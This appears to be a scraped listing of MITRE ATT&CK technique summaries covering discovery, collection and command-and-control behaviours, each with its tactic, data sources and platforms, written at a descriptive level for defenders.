Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre